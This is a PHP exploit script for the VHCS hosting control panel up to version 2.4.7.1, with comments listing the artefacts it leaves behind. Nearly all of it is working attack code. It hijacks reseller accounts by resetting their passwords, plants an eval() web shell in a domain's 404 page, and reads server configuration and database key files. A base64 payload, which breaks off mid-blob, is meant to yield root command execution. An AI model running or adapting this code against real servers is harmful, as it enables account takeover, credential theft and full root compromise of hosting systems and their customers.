`#!/usr/bin/php -q
<?php
# This file requires the PhpSploit class.
# If you want to use this class, the latest
# version can be downloaded from acid-root.new.fr.
##################################################
# Notices are masked for the whole run. Several names used later are never
# defined (the local $edit and the property $this->ur in bypass_with_db(),
# the next-argument lookup in getparam()); with E_NOTICE on they would warn.
error_reporting(E_ALL ^ E_NOTICE);
# Base class supplying the HTTP/cookie helpers used by vhcs_xpl (get, post,
# addheader, getcontent, allowredirection, ...). Not part of this listing.
require('phpsploitclass.php');
# darkfig@darky:/# ./vhcs_sploit.php -url http://localhost/vhcs2/
#
# VHCS <= 2.4.7.1 (vhcs2_daemon) Remote Root Exploit
# --------------------------------------------------
#
# About:
# by DarkFig < gmdarkfig (at) gmail (dot) com >
# http://acid-root.new.fr/
# #[email protected]
#
# Exploit:
# + Logged in (Administrator)
# + The administrator has 2 resellers
# / Changing dareseller's password
# / Trying to connect as dareseller:thatpwnz
# + Login successful
# + The reseller has 2 users
# + Host domaintest.fr is connected
# / Trying to write PHP code
# + PHP code successfully written
# / We'll have to bypass open_basedir cause safe_mode=On
# - User doesn't have SQL rights
# / Host domaintest.fr isn't a valid user
# + Host xpliamaclient.com is connected
# / Trying to write PHP code
# + PHP code successfully written
# / We'll have to bypass open_basedir cause safe_mode=On
# - User doesn't have SQL rights
# / Host xpliamaclient.com isn't a valid user
# / Changing unautresel's password
# / Trying to connect as unautresel:thatpwnz
# + Login successful
# + The reseller has 1 users
# + Host thegoodone.com is connected
# / Trying to write PHP code
# + PHP code successfully written
# / We'll have to bypass open_basedir cause safe_mode=On
# / Trying to create a database
# + Database 92xpl_db39 successfully created
# + Using database id 12
# / Trying to add SQL user
# + User 93xpl_usr2 successfully created
# + Using SQL user id 17
# + Host thegoodone.com is a valid user
# + Logged in (thegoodone.com - Client)
# / Trying to load files via local_infile
# + Ok: /etc/vhcs2/vhcs2.conf
# + Ok: /var/www/vhcs2/gui/include/vhcs2-db-keys.php
# + Now you can execute commands as root =]
# + [email protected]: id
#
# uid=0(root) gid=0(root)
#
# Exploit driver for VHCS <= 2.4.7.1. Every HTTP/cookie helper used below
# (agent, cookiejar, proxy, proxyauth, allowredirection, get, post, addheader,
# getcontent, reset, last_redirection) is inherited from the phpsploit base
# class in phpsploitclass.php, which is not in this listing; their exact
# behaviour is assumed from the call sites, not verified here.
#
# Artefacts this tool leaves on a target, as far as the code below shows
# (useful for detection and clean-up): reseller passwords reset to 'thatpwnz'
# with the contact e-mail rewritten to <name>@ohyeah.com and all
# nreseller_max_* limits set to 0 (logged_as_admin); a PHP stub prepended to
# the per-domain 404 error page that eval()s the base64 body of a 'Shell'
# request header (write_code / exec_php); databases and SQL users named
# <n>xpl_db<n> / <n>xpl_usr<n> with password 'xpl_pwd' (bypass_with_db);
# temporary MySQL tables named <n>tmp_hax<n> filled via LOAD DATA LOCAL
# INFILE (path_content); and 'Sploit-*' request headers with base64 values
# (set_hvar). Nothing in this class undoes any of these changes.
# ereg() is used throughout; it was removed in PHP 7, so this code only runs
# on PHP 5.x or older.
class vhcs_xpl extends phpsploit
{
# Handed to the payload as the 'sleep-time' header in exec_cmd(); what the
# payload does with it is inside the base64 blob and not readable here.
var $sleep_time = 4;
# Files read from the target in get_vhcs_conf(). The mode lines are the
# author's notes on a stock installation.
# -rw-r--r-- 1 root root
var $conf_path = '/etc/vhcs2/vhcs2.conf';
# -r-------- 1 www-data www-data
var $keys_path = '/var/www/vhcs2/gui/include/vhcs2-db-keys.php';
# Post-login redirect path -> privilege level (see get_type_by_redir()).
# A path not listed here yields null, which every caller treats as 0.
var $head_arr = array(
'admin/index.php' => 3,
'reseller/index.php' => 2,
'../reseller/index.php' => 2,
'client/index.php' => 1,
'' => 0);
# Privilege level -> label used in status messages.
var $privileges = array(
3 => 'Administrator',
2 => 'Reseller',
1 => 'Client');
# Patterns scraped from VHCS HTML pages:
#  1: reseller id / name   (admin/manage_users.php)
#  2: user id / name       (reseller/users.php)
#  3, 4: database id       (client/manage_sql.php; the two are identical)
#  5: SQL user id          (client/manage_sql.php)
var $reg_arr = array(
1 => '#edit_reseller\.php\?edit_id=([0-9]+)" class="link">(.*) </a> </td>#i',
2 => '#edit_user.php\?edit_id=([0-9]+)" class="link">(.*)</a></td>#i',
3 => '#delete_sql_database\.php\?id=([0-9]+)#i',
4 => '#delete_sql_database\.php\?id=([0-9]+)#i',
5 => '#sql_execute_query.php\?id=([0-9]+)#i');
# Console prefix per msg() flag: -1 failure, 0 in progress, 1 success.
var $flags = array(
-1 => '-',
0 => '/',
1 => '+');
# Entry point: parses the command line, logs in, pulls the VHCS config and
# key file from the target, then enters the interactive loop in exec_cmd(),
# which ends the process with exit(0). main() never returns to its caller
# on a successful run.
function main()
{
$this->agent('Mozilla Firefox');
$this->cookiejar(1);
$this->mhead();
# -url is mandatory: getparam() goes to usage() (exit) when it is missing.
$this->uri = $this->getparam('url', TRUE);
$this->url_arr = parse_url($this->uri);
$this->patch = $this->getparam('patch');
$this->proxh = $this->getparam('proxhost');
$this->proxa = $this->getparam('proxauth');
if($this->proxh)
$this->proxy($this->proxh);
if($this->proxa)
$this->proxyauth($this->proxa);
print "\nExploit:";
$this->type = $this->login();
# Both branches below end in usage() via msg(..., 1), so the "Logged in"
# line is only reached with a non-empty privilege level.
if(empty($this->type))
{
if(!$this->patch)
{
$this->msg('A patch has been applied to this website', -1);
$this->msg("See RoMaNSoFt's advisory for more details", -1);
$this->msg('Try with the -patch option', -1, 1);
}
else
$this->msg('Bad username/password', -1, 1);
}
$this->msg("Logged in (".$this->usr.' - '.$this->privileges[$this->type].')', 1);
$this->allowredirection(1);
$this->get_vhcs_conf();
$this->exec_cmd();
return;
}
# Returns the argument that follows "-<param>" on the command line, or FALSE
# when the flag is absent. $argv is walked as index => argument, so $value
# is the position and $key the text (the names are the wrong way round).
# If the flag is the last argument, $argv[$value+1] does not exist and null
# comes back (the notice is masked by error_reporting at the top of the
# file). With $nec set, a missing flag goes to usage(), which exits.
function getparam($param, $nec=FALSE)
{
global $argv;
foreach($argv as $value => $key)
{
if($key === '-'.$param)
return $argv[$value+1];
}
if($nec)
$this->usage();
return FALSE;
}
# Prints the banner.
function mhead()
{
print "\n VHCS <= 2.4.7.1 (vhcs2_daemon) Remote Root Exploit";
print "\n --------------------------------------------------\n";
print "\nAbout:";
print "\n by DarkFig < gmdarkfig (at) gmail (dot) com >";
print "\n http://acid-root.new.fr/";
print "\n #[email protected]";
print "\n";
return;
}
# Prints the option summary and terminates with status 1. Never returns.
function usage()
{
print "\nUsage:";
print "\n vhcsxpl.php -url <url> [options...]\n";
print "\nOptions:";
print "\n -patch <user:pwd> Unofficial patch applied";
print "\n -proxhost <ip> If you wanna use a proxy";
print "\n -proxauth <usr:pwd> Proxy with authentication\n";
print "\n";
exit(1);
}
# Submits $this->usr / $this->pwd to chk_login.php and classifies the result
# by the redirect target (see head_arr). The password is echoed in clear on
# the console. Returns the privilege level, 0 (or null for an unlisted
# redirect path) when the login did not land on a known index page.
function log_as()
{
$this->msg("Trying to connect as ".$this->usr.':'.$this->pwd, 0);
$this->allowredirection(1);
$this->post($this->uri.'chk_login.php',
'uname='.$this->usr.'&upass='.$this->pwd.'&Submit=+++Login+++');
$this->redir_type = $this->get_type_by_redir();
if($this->redir_type == 0)
$this->msg('Login attempt failed', -1);
else
$this->msg('Login successful', 1);
return $this->redir_type;
}
# Looks up the path of the last redirect in head_arr and switches redirect
# following back off. last_redirection is presumably maintained by the base
# class HTTP helpers (not visible here). An unknown path gives null.
function get_type_by_redir()
{
$this->redir_arr = parse_url($this->last_redirection);
$this->allowredirection(0);
return $this->head_arr[$this->redir_arr['path']];
}
# With -patch <user:pwd>: authenticate with the supplied credentials (no
# check that the value actually contains a colon) and walk down the
# privilege chain from whatever level that login yields. Without -patch:
# assume the unauthenticated request to admin/manage_users.php is served as
# administrator and confirm by looking for the 'add_user.php' link.
# Returns 1 once a usable client account has been reached, otherwise 0.
function login()
{
if($this->patch)
{
$this->idents = explode(':', $this->patch);
list($this->usr, $this->pwd) = $this->idents;
$this->type = $this->log_as();
return $this->log_as_user();
}
else
{
$this->get($this->uri.'admin/manage_users.php');
$this->type = 3;
if(ereg('add_user\.php', $this->getcontent()))
return $this->log_as_user();
else
return 0;
}
}
# Descends from the current privilege level towards a client account. The
# return values of logged_as_admin() / logged_as_reseller() are discarded;
# success is conveyed by side effect only: logged_as_reseller() sets
# $this->type to 1 and $this->patch to FALSE, which the final checks read.
# A type that is still 3 or 2 at the end therefore means nothing was found.
function log_as_user()
{
if($this->type == 3)
$this->logged_as_admin();
if($this->type == 2)
$this->logged_as_reseller();
if($this->type == 1)
{
# patch is cleared by logged_as_reseller(); a client login given
# directly via -patch still has it set and must prove itself first.
if(!$this->patch)
return 1;
else
return $this->valid_user();
}
else
return 0;
}
# A client account counts as usable when the 404-page stub can be written
# and, if the remote PHP reports safe_mode or lacks shell_exec, the SQL
# route through bypass_with_db() is available as well. Returns 1 or 0.
function valid_user()
{
if($this->write_code())
{
# open_basedir + safe_mode
if($this->is_safe())
{
if($this->bypass_with_db())
return 1;
else
return 0;
}
else
return 1;
}
return 0;
}
# Enumerates resellers from admin/manage_users.php and tries each one.
# Without -patch the reseller's credentials are overwritten (see the POST
# below); with -patch the admin "change user interface" switch is used
# instead. Returns 1 as soon as one reseller yields a usable client, 0 when
# none does. A reseller whose login fails aborts the loop rather than being
# skipped. Every reseller tried gets the same constant password 'thatpwnz'.
function logged_as_admin()
{
$this->msg('Logged in ('.$this->privileges[3].')', 1);
$this->get($this->uri.'admin/manage_users.php');
preg_match_all($this->reg_arr[1], $this->getcontent(), $resellers);
$this->reseller_count = count($resellers[1]);
$this->msg('The administrator has '.$this->reseller_count.' resellers', 1);
for($i=0; $i<$this->reseller_count; $i++)
{
$this->usr = $resellers[2][$i];
$this->pwd = 'thatpwnz';
if(!$this->patch)
{
$this->msg('Changing '.$resellers[2][$i]."'s password", 0);
$this->reseller_dat = '';
$this->get($this->uri.'admin/edit_reseller.php?edit_id='.$resellers[1][$i]);
# only checked ip
# The edit form rejects a reseller without IPs, so the currently
# assigned ones are collected and re-sent unchanged.
preg_match_all('#name="ip_([0-9]+)" value="asgned" checked#i',
$this->getcontent(), $reseller_ips);
$this->ip_count = count($reseller_ips[1]);
$this->ip_dat = '';
for($j=0; $j<$this->ip_count; $j++)
{
$this->ip_dat .= 'ip_'.$reseller_ips[1][$j].'=asgned';
if($j != $this->ip_count-1)
$this->ip_dat .= '&';
}
# Change reseller's password/mail
# This is needed if it was run without -path
# Because we can't click on the 'Change' button.
#
# pwd: thatpwnz
# mail: <reseller_name>@ohyeah.com
#
# Side effects on the target: the reseller's real password and contact
# e-mail are replaced and every nreseller_max_* limit is set to 0.
# Nothing in this class restores any of it.
$this->post($this->uri.'admin/edit_reseller.php',
'username='.$resellers[2][$i].'&pass=thatpwnz&'.
'pass_rep=thatpwnz&email='.$resellers[2][$i].''.
'%40ohyeah.com&nreseller_max_domain_cnt=0&nres'.
'eller_max_subdomain_cnt=0&nreseller_max_alias'.
'_cnt=0&nreseller_max_mail_cnt=0&nreseller_max'.
'_ftp_cnt=0&nreseller_max_sql_db_cnt=0&nresell'.
'er_max_sql_user_cnt=0&nreseller_max_traffic=0'.
'&nreseller_max_disk=0&'.$this->ip_dat.'&custo'.
'mer_id=&fname=&lname=&firm=&zip=&city=&countr'.
'y=&street1=&street2=&phone=&fax=&Submit=++Upd'.
'ate++&uaction=update_reseller&edit_id='.
$resellers[1][$i].'&edit_username='.
$resellers[2][$i]);
# A failed reseller login ends the whole scan, not just this reseller.
if($this->log_as() != 2)
return 0;
}
else
{
$this->allowredirection(1);
$this->get($this->uri.'admin/change_user_interface.php?to_id='.$resellers[1][$i]);
if($this->get_type_by_redir() != 2)
return 0;
}
if($this->logged_as_reseller())
return 1;
# Drop the reseller session and return to the admin interface before
# trying the next reseller.
$this->reset('cookie');
$this->get($this->uri.'reseller/change_user_interface.php?action=go_back');
}
return 0;
}
# Enumerates the reseller's users from reseller/users.php and tries each
# domain whose name resolves. Returns TRUE at the first usable client (with
# $this->usr set to its domain and $this->type set to 1), FALSE otherwise.
function logged_as_reseller()
{
$this->get($this->uri.'reseller/users.php');
preg_match_all($this->reg_arr[2], $this->getcontent(), $users);
# No effect: array_walk passes each element by value and trim() returns
# its result instead of modifying the argument, so names keep any
# surrounding whitespace captured by the regex.
array_walk($users[2], 'trim');
$this->user_count = count($users[1]);
$this->msg('The reseller has '.$this->user_count. ' users', 1);
# Cleared so that the client branch of log_as_user() accepts this account.
$this->patch = FALSE;
for($i=0; $i<$this->user_count; $i++)
{
# is_alive() is a DNS lookup from the operator's host, not a probe of
# the site itself.
if($this->is_alive($users[2][$i]))
{
$this->usr = $users[2][$i];
$this->type = 1;
$this->msg('Host '.$this->usr.' is connected', 1);
$this->get($this->uri.'reseller/change_user_interface.php?to_id='.$users[1][$i]);
if($this->valid_user())
{
$this->msg('Host '.$this->usr.' is a valid user', 1);
return TRUE;
}
else
$this->msg("Host ".$this->usr." isn't a valid user", 0);
}
else
$this->msg('Host '.$users[2][$i].' seems down', -1);
# Issued after every iteration, even when the user interface was never
# switched because the host did not resolve.
$this->get($this->uri.'client/change_user_interface.php?action=go_back');
}
return FALSE;
}
# Makes sure the client has a database and a SQL user to run queries with,
# creating both under random names when missing. Leaves the ids in
# $this->db_id and $this->db_user_id. Returns TRUE on success.
function bypass_with_db()
{
$this->get($this->dmn_vhcs_url.'client/index.php');
# $edit is never defined, so !$edit is always true and the condition
# reduces to the ereg() test. $this->ur is also undefined (apparently a
# typo for $this->usr), which is why the message carries no user name --
# compare the nameless line in the sample run at the top of the file.
if(!ereg('manage_sql.php', $this->getcontent()) and !$edit)
{
$this->msg("User ".$this->ur." doesn't have SQL rights", -1);
return FALSE;
}
# No database
if(!$this->got_db())
{
$this->msg('Trying to create a database', 0);
# Name pattern <0-100>xpl_db<0-100>: a searchable artefact in the
# target's MySQL instance.
$this->tmp_db_name = rand(0,100).'xpl_db'.rand(0,100);
# Database: ..xpl_db..
$this->post($this->dmn_vhcs_url.'client/add_sql_database.php',
'db_name='.$this->tmp_db_name.'&id_pos=start&Submit=++Add++&'.
'uaction=add_db');
if($this->got_db())
$this->msg('Database '.$this->tmp_db_name.' successfully created', 1);
else
{
$this->msg("Can't create the database ".$this->tmp_db_name, 0);
return FALSE;
}
}
# First database
# sql_db_ids is filled by got_db(); index 1 is the first capture group,
# i.e. the id of the first database link on manage_sql.php.
$this->db_id = $this->sql_db_ids[1];
$this->msg('Using database id '.$this->db_id, 1);
if(!$this->got_db_user())
{
$this->msg('Trying to add SQL user', 0);
# Name pattern <0-100>xpl_usr<0-100>, fixed password 'xpl_pwd'.
$this->tmp_db_user = rand(0,100).'xpl_usr'.rand(0,100);
# SQL user: ..xpl_usr..:xpl_pwd
$this->post($this->dmn_vhcs_url.'client/sql_add_user.php',
'user_name='.$this->tmp_db_user.'&id_pos=end&pass=xpl_pw'.
'd&pass_rep=xpl_pwd&Add_New=++Add++&uaction=add_user&id='.
$this->db_id);
if($this->got_db_user())
$this->msg('User '.$this->tmp_db_user.' successfully created', 1);
else
{
$this->msg("Can't create the SQL user ".$this->tmp_db_user, 0);
return FALSE;
}
}
# First SQL user id associed with the database
# sql_usrs is left by the successful preg_match inside got_db_user().
$this->db_user_id = $this->sql_usrs[1];
$this->msg('Using SQL user id '.$this->db_user_id, 1);
return TRUE;
}
# Scans client/manage_sql.php line by line. reg_arr[4] marks which database
# block the scan is in (is_sql_db_usr is true while it is $this->db_id),
# reg_arr[5] marks a SQL user link. Returns TRUE at the first user link that
# appears under $this->db_id, leaving that user's id in $this->sql_usrs[1];
# FALSE when the page has none. count() is re-evaluated on every iteration.
function got_db_user()
{
$this->get($this->dmn_vhcs_url.'client/manage_sql.php');
$this->content_arr = explode("\n", $this->getcontent());
$this->is_sql_db_usr = FALSE;
for($i=0; $i<count($this->content_arr); $i++)
{
if(preg_match($this->reg_arr[4],
$this->content_arr[$i], $this->sql_db_id))
{
if($this->sql_db_id[1] == $this->db_id)
$this->is_sql_db_usr = TRUE;
else
$this->is_sql_db_usr = FALSE;
}
if(preg_match($this->reg_arr[5],
$this->content_arr[$i], $this->sql_usrs))
{
if($this->is_sql_db_usr)
return TRUE;
}
}
return FALSE;
}
# TRUE when client/manage_sql.php lists at least one database. preg_match
# stops at the first hit, so $this->sql_db_ids[1] ends up holding the first
# database id on the page.
function got_db()
{
$this->get($this->dmn_vhcs_url.'client/manage_sql.php');
preg_match($this->reg_arr[3],
$this->getcontent(), $this->sql_db_ids);
if(empty($this->sql_db_ids))
return FALSE;
else
return TRUE;
}
# TRUE when $domain_name resolves. gethostbyname() returns its argument
# unchanged on failure, so inequality means a lookup succeeded. The lookup
# runs on the operator's host.
function is_alive($domain_name)
{
if(gethostbyname($domain_name) != $domain_name)
return TRUE;
else
return FALSE;
}
# Plants a PHP stub in the client domain's 404 error page through
# client/error_pages.php (eid=404). The stub eval()s the base64-decoded
# value of an 'HTTP_SHELL' request header and then exits; everything else
# in the page is left as it was. exec_php() talks to it afterwards.
# The previous page body is saved in $this->old_404 but never written back,
# so the stub remains on the site. Returns TRUE when a test round-trip
# through the stub prints the expected marker.
function write_code()
{
$this->msg('Trying to write PHP code', 0);
$this->dmn_url = 'http://'.$this->usr;
# The VHCS path from -url is assumed to exist on the client domain too.
$this->dmn_vhcs_url = $this->dmn_url.$this->url_arr['path'];
$this->get($this->dmn_url.'/errors/404/index.php');
$this->old_404 = $this->getcontent();
$this->phpc =
'<?php '
.'error_reporting(0); '
.'if(isset($_SERVER[\'HTTP_SHELL\'])) '
.'{ eval(base64_decode($_SERVER[\'HTTP_SHELL\'])); exit(0); } '
.'?>';
$this->new_404 = $this->phpc.$this->old_404;
$this->post($this->dmn_vhcs_url.'client/error_pages.php',
'error='.urlencode($this->new_404).'&uaction=updt_error&eid=404&Submit=+Save+');
$this->exec_php('print "itworkz";');
if(ereg('itworkz', $this->getcontent()))
{
$this->msg('PHP code successfully written', 1);
return TRUE;
}
else
{
$this->msg("Can't write PHP code", -1);
return FALSE;
}
}
# Reads vhcs2.conf from the target, parses its "NAME = value" lines into
# $this->conf with upper-cased keys, then reads the DB key file into
# $this->php_keys_code. The read route depends on $this->safe_mode, which
# is_safe() set earlier. Because keys are upper-cased here, the later
# lookup of $this->conf['Version'] in exec_cmd() can never match.
function get_vhcs_conf()
{
if($this->safe_mode)
$this->msg('Trying to load files via local_infile', 0);
else
$this->msg('Trying to load files via shell_exec', 0);
$this->lf_conf = $this->path_content($this->conf_path);
# Only leading/trailing CRs are stripped; CRs inside the file stay and
# end up in the values.
$this->lf_conf = trim($this->lf_conf, "\r");
$this->vhcs_conf = explode("\n", $this->lf_conf);
$this->conf = array();
foreach($this->vhcs_conf as $this->conf_line)
{
# comment
if(!ereg('^(\s*)#', $this->conf_line))
{
$this->pos = strpos($this->conf_line, '=');
$this->name = strtoupper(trim(substr($this->conf_line, 0, $this->pos)));
$this->value = trim(substr($this->conf_line, $this->pos+1));
$this->conf[$this->name] = $this->value;
}
}
$this->php_keys_code = $this->path_content($this->keys_path);
return;
}
# Returns the content of $path on the target, or an empty value on failure.
# Two routes: with safe_mode off, `cat` through shell_exec in the 404 stub
# (the path goes into the shell command unquoted); with safe_mode on, a
# MySQL temp table <rand>tmp_hax<rand> is loaded with LOAD DATA LOCAL INFILE
# and read back as hex between two CHAR() markers (they spell
# "PWNEDCONTENT", the string exec_sql() looks for). Either route shows up
# in web logs (a 'Shell' header) and, for the second, in MySQL logs.
function path_content($path)
{
# open_basedir On/off
# safe_mode = Off
if(!$this->safe_mode)
{
$this->phpc = 'print shell_exec("cat '.$path.'");';
$this->exec_php($this->phpc);
$this->file_content = $this->getcontent();
}
# open_basedir On/Off
# safe_mode = On
else
{
$this->rand_table = rand().'tmp_hax'.rand();
$this->sql_query =
"CREATE TABLE ".$this->rand_table." (content text not null); ".
"LOAD DATA LOCAL INFILE '$path' INTO TABLE ".$this->rand_table.
" FIELDS TERMINATED BY '__EOF__' ESCAPED BY '' LINES TERMINAT".
"ED BY '__EOF__'; SELECT CONCAT(CHAR(80,87,78,69,68,67,79,78,".
"84,69,78,84),HEX(content),CHAR(80,87,78,69,68,67,79,78,84,69".
",78,84)) FROM ".$this->rand_table."; DROP TABLE ".
$this->rand_table;
# The four statements are sent one at a time; the result of the
# third one (index sql_cnt-2, the SELECT) is the file content.
$this->sql_arr = explode(';', $this->sql_query);
$this->sql_cnt = count($this->sql_arr);
for($i=0; $i<$this->sql_cnt; $i++)
{
$this->sql_res = $this->exec_sql($this->sql_arr[$i]);
if($i == $this->sql_cnt-2)
$this->file_content = $this->sql_res;
}
}
if(!$this->file_content)
{
$this->msg("A problem occurred while trying to read the file $path", -1);
# Action 2 exits the process; action -2 is not handled by msg(), so the
# shell_exec branch reports the error and carries on.
if($this->safe_mode)
$this->msg("local_infile=Off or we don't have sufficient access rights to the file", -1, 2);
else
$this->msg("We don't have sufficient access rights to the file", -1, -2);
}
else
$this->msg("Ok: $path", 1);
return $this->file_content;
}
# Runs one SQL statement through client/sql_execute_query.php as user
# $this->db_user_id and returns the hex-decoded text found between the
# two PWNEDCONTENT markers, or '' when the markers are absent.
function exec_sql($query)
{
$this->post($this->dmn_vhcs_url.'client/sql_execute_query.php',
'user_name=&sql_query='.$query.'&Submit=+Execute+&uaction=exe'.
'cute_query&id='.$this->db_user_id);
$this->sql_result = '';
if(ereg('PWNEDCONTENT', $this->getcontent()))
{
$this->sql_res_arr = explode('PWNEDCONTENT', $this->getcontent());
$this->sql_result = pack('H*', $this->sql_res_arr[1]);
}
return $this->sql_result;
}
# Probes the target's PHP through the 404 stub: reports "safe_mode=on" when
# safe_mode is enabled or shell_exec() is unavailable. Records the outcome
# in $this->safe_mode and returns it.
function is_safe()
{
$this->phpc =
'if(in_array(strtoupper(ini_get("safe_mode")),array("ON","1")) '
.'or !function_exists("shell_exec")) '
.'{ print "safe_mode=on"; }';
$this->exec_php($this->phpc);
# open_basedir always set
if(ereg('safe_mode=on', $this->getcontent()))
{
$this->msg("We'll have to bypass open_basedir cause safe_mode=On", 0);
$this->safe_mode = TRUE;
}
else
{
$this->msg('PHP configured with default safe_mode value (Off)', 0);
$this->safe_mode = FALSE;
}
return $this->safe_mode;
}
# Interactive loop: reads a command from stdin, passes the DB settings from
# vhcs2.conf, a temp file path under the web root and the command itself
# to the target as base64 'Sploit-*' request headers, then evaluates the
# base64-encoded payload below through the 404 stub and prints the reply.
# The payload is opaque in this listing (it is not decoded here), so what
# it does with those headers is not documented. Ends the process with
# exit(0) when the prompt returns FALSE.
function exec_cmd()
{
$this->msg("Now you can execute commands as root =]", 1);
$this->woot_code =
'PD9waHAKCi8qCm1haWwoJ2xlZXRAcHduZWQuY29tJywgJ3Z1bG'
.'5lcmFibGUgdmhjcyBob3N0ICEnLCAndGh4IHRvIHRoZSBzayAh'
.'IHZoY3MgdnVsbiBob3N0OiAnLiRfU0VSVkVSWydSRU1PVEVfQU'
.'REUiddKTsKdGhpcyBpcyBhIGpva2UgPVAgd2hlbiB5b3UgdXNl'
.'IGVuY29kZWQgcGhwIGNvZGUsIHNlZSB3aGF0IGlzIGl0IGJlZm'
.'9yZSB1c2luZyBpdCA9KQoqLwokdmFsaWRfdiA9ICdIVFRQX1NQ'
.'TE9JVF8nOwoKZm9yZWFjaCgkX1NFUlZFUiBhcyAkaGVhZGVyID'
.'0+ICR2YWx1ZSkKewoJaWYoIWlzX2FycmF5KCR2YWx1ZSkpCgl7'
.'CgkJJHZhbHVlID0gYmFzZTY0X2RlY29kZSgkdmFsdWUpOwoKCQ'
.'lpZihlcmVnKCR2YWxpZF92LCRoZWFkZXIpKQoJCXsKCQkJaWYo'
.'ZXJlZygnUEhQX0tFWVMnLCAkaGVhZGVyKSkKCQkJICAgZXZhbC'
.'gkdmFsdWUpOwoKCQkJZWxzZQoJCQl7CgkJCQkkdmFyX24gID0g'
.'c3RydG9sb3dlcihzdHJfcmVwbGFjZSgkdmFsaWRfdiwnJywgJG'
.'hlYWRlcikpOwoJCQkJJCR2YXJfbiA9ICR2YWx1ZTsKCQkJfQoJ'
.'CX0KCX0KfQoKbXlzcWxfY29ubmVjdCgkZGJfaG9zdCwkZGJfdX'
.'NlcixkZWNyeXB0X2RiX3Bhc3N3b3JkKCRkYl9wYXNzKSk7Cm15'
.'c3FsX3NlbGVjdF9kYigkZGJfbmFtZSk7CgokZmlsZSA9IGFkZH'
.'NsYXNoZXMoJGZpbGUpOwokY21kICA9IGFkZHNsYXNoZXMoJGNt'
.'ZCk7CiRWZXJzaW9uID0gJHZlcnNpb247CgokYWRkID0gYXJyYX'
.'koKTsKJGFkZFtdID0gCiJJTlNFUlQgSU5UTyBkb21haW4gKGBk'
.'b21haW5fbmFtZWAsYGRvbWFpbiIuCiJfZ2lkYCxgZG9tYWluX3'
.'VpZGAsYGRvbWFpbl9hZG1pbl9pZGAsYGRvbSIuCiJhaW5fY3Jl'
.'YXRlZF9pZGAsYGRvbWFpbl9jcmVhdGVkYCxgZG9tYWluXyIuCi'
.'JsYXN0X21vZGlmaWVkYCxgZG9tYWluX21haWxhY2NfbGltaXRg'
.'LGBkbyIuCiJtYWluX2Z0cGFjY19saW1pdGAsYGRvbWFpbl90cm'
.'FmZmljX2xpbWl0YCIuCiIsYGRvbWFpbl9zcWxkX2xpbWl0YCxg'
.'ZG9tYWluX3NxbHVfbGltaXRgLCIuCiJgZG9tYWluX3N0YXR1c2'
.'AsYGRvbWFpbl9hbGlhc19saW1pdGAsYGRvbSIuCiJhaW5fc3Vi'
.'ZF9saW1pdGAsYGRvbWFpbl9pcF9pZGAsYGRvbWFpbl9kaSIuCi'
.'Jza19saW1pdGAsYGRvbWFpbl9kaXNrX3VzYWdlYCxgZG9tYWlu'
.'X3BocCIuCiJgLGBkb21haW5fY2dpYCkgVkFMVUVTICgnZGVsZX'
.'RlbWViaWF0Y2g7JGNtZCIuCiIgPiAkZmlsZTtybSAvdG1wL2h0'
.'YWNjZXNzLXVzZXItY2YtZGVsZXRlbSIuCiJlYmlhdGNoO2VjaG'
.'8gMSMnLCcwJywgJzAnLCAnLTEnLCAnLTEnLCAnMCIuCiInLCAn'
.'MCcsICcwJywgJzAnLCAnMCcsICcwJywgJzAnLCdvaycsICcwJy'
.'IuCiIsJzAnLCAnLTEnLCAnMCcsICcwJywgJ3llcycsICd5ZXMn'
.'KSI7CgokYWRkW10gPQoiSU5TRVJUIElOVE8gaHRhY2Nlc3MgKG'
.'BkbW5faWRgLGB1c2VyX2lkYCwiLgoiYGdyb3VwX2lkYCxgYXV0'
.'aF90eXBlYCxgYXV0aF9uYW1lYCxgcGF0aGAiLgoiLGBzdGF0dX'
.'NgKSBWQUxVRVMgKChTRUxFQ1QgZG9tYWluX2lkIEZST00iLgoi'
.'IGRvbWFpbiBXSEVSRSBkb21haW5fbmFtZSBMSUtFICclJGZpbG'
.'UlJykiLgoiLC0xLDAsJ0Jhc2ljJywnaHVodScsJy90bXAnLCd0'
.'b2FkZCcpIjsKCmV4ZWNfc3FsKCRhZGQpOwoKc2VuZF9yZXF1ZX'
.'N0KCk7CnNsZWVwKCRzbGVlcF90aW1lKTsKcHJpbnQoZmlsZV9n'
.'ZXRfY29udGVudHMoJGZpbGUpKTsKdW5saW5rKCRmaWxlKTsKCi'
.'RkZWwgPSBhcnJheSgpOwokZGVsW10gPSAKIkRFTEVURSBGUk9N'
.'IGh0YWNjZXNzIFdIRVJFIGRtbl9pZCA9IChTRUxFQyIuCiJUIG'
.'RvbWFpbl9pZCBGUk9NIGRvbWFpbiBXSEVSRSBkb21haW5fbmFt'
.'ZSAiLgoiTElLRSAnJSRmaWxlJScpIjsKCiRkZWxbXSA9CiJERU'
.'xFVEUgRlJPTSBkb21haW4gV0hFUkUgZG9tYWluX25hbWUgTElL'
.'RSAiLgoiJyUkZmlsZSUnIjsKCmV4ZWNfc3FsKCRkZWwpOwoKZn'
.'VuY3Rpb24gZXhlY19zcWwoJHNxbF9hcnIpCnsKCWZvcmVhY2go'
.'JHNxbF9hcnIgYXMgJHNxbF9xKQoJICAgbXlzcWxfcXVlcnkoJH'
.'NxbF9xKSB8fCBkaWUobXlzcWxfZXJyb3IoKSk7CgoJcmV0dXJu'
.'Owp9CgovLyB2aGNzCmZ1bmN0aW9uIGRlY3J5cHRfZGJfcGFzc3'
.'dvcmQgKCRkYl9wYXNzKSB7CgogICAgIGdsb2JhbCAkdmhjczJf'
.'ZGJfcGFzc19rZXk7CiAgICAgZ2xvYmFsICR2aGNzMl9kYl9wYX'
.'NzX2l2OwogICAgICAgICAgIAogICAgJHRleHQgPSBiYXNlNjRf'
.'ZGVjb2RlKCIkZGJfcGFzc1xuIik7CiAgICAKICAgIC8qIE9wZW'
.'4gdGhlIGNpcGhlciAqLwogICAgJHRkID0gbWNyeXB0X21vZHVs'
.'ZV9vcGVuICgnYmxvd2Zpc2gnLCAnJywgJ2NiYycsICcnKTsKIC'
.'AgIAogICAgLyogQ3JlYXRlIGtleSAqLwogICAgICAgICRrZXkg'
.'PSAkdmhjczJfZGJfcGFzc19rZXk7CiAgICAKICAgIC8qIENyZW'
.'F0ZSB0aGUgSVYgYW5kIGRldGVybWluZSB0aGUga2V5c2l6ZSBs'
.'ZW5ndGggKi8KICAgICAgICAkaXYgPSAkdmhjczJfZGJfcGFzc1'
.'9pdjsKICAgICAgCiAgICAvKiBJbnRpYWxpemUgZW5jcnlwdGlv'
.'biAqLyAgICAgICAgICAgICAgICAgICAgCiAgICBtY3J5cHRfZ2'
.'VuZXJpY19pbml0ICgkdGQsICRrZXksICRpdik7CiAgICAgICAg'
